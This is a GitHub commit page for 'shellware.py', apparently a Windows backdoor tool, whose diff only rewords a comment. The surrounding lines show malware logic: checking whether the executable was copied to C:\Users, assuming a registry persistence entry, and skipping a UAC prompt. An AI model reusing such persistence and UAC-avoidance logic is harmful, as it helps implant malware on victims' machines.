Skip to content

Commit bb4763b

Browse files
author
NullArray
committed
Update shellware.py
1 parent 17a2191 commit bb4763b

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

shellware.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -108,8 +108,8 @@ def main():
108108
execute()
109109

110110

111-
# Check to see if we're already copied to C:\Users, if so, we're going to assume
112-
# registry entry for persistence and copy to dir were succesful and not prompt UAC.
111+
# Check to see if we're already copied to C:\Users, if so, we know copy operation was succesful
112+
# and will assume registry entry for persistence was set and not prompt UAC.
113113
if os.path.isfile("C:\Users\shellware.exe"):
114114
pass
115115
else:

0 commit comments

Comments
 (0)